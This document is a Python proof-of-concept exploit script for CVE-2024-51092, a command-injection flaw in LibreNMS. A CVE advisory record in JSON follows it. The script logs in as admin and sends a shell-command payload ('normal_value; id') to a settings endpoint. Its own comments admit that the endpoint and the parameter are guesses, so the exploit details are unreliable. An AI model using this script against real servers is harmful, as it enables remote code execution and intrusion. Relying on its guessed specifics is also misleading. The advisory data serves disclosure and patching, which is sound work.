CVE-2024-51092

#!/usr/bin/env python3 # Proof of Concept for CVE-2024-51092 (LibreNMS Authenticated RCE) # This script demonstrates the command injection vulnerability in SettingsController. import requests from requests.auth import HTTPBasicAuth # Configuration target_url = "http://127.0.0.1/librenms" username = "admin" password = "password" command = "id" # The command to execute # The vulnerable endpoint often involves updating settings where parameters are sanitized poorly # Based on the advisory, SettingsController.php's update() is vulnerable. # Payload structure usually involves appending a command separator. payload = f"normal_value; {command}" session = requests.Session() # 1. Login to obtain session (Authentication is required) login_url = f"{target_url}/login" login_data = { "username": username, "password": password } print(f"[*] Logging in to {target_url}...") r = session.post(login_url, data=login_data) if r.status_code == 200: print("[+] Login successful.") # 2. Exploit the vulnerability in SettingsController # Note: The specific parameter name and endpoint path might vary based on the exact controller logic. # This is a representative example of exploiting the update() method. exploit_url = f"{target_url}/settings/update" exploit_data = { "setting[global][community]": payload # Example parameter that might be passed to shell } print(f"[*] Sending payload to {exploit_url}...") exploit_res = session.post(exploit_url, data=exploit_data) # 3. Check output (Output might not be directly reflected, blind techniques needed) if exploit_res.status_code == 200: print("[+] Payload sent. Check if command was executed (e.g., via netcat listener or log analysis).") else: print("[-] Exploit request failed.") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2024-51092", "sourceIdentifier": "[email protected]", "published": "2026-05-08T06:16:10.090", "lastModified": "2026-05-12T13:50:21.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS before 24.10.0 allows a remote attacker to execute arbitrary code via OS command injection involving AboutController.php's index(), SettingsController.php's update(), and PollDevice.php's initRrdDirectory()."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.10.0", "matchCriteriaId": "B4BD88D2-5DA7-450B-AEFA-33BCA61685A7"}]}]}], "references": [{"url": "https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}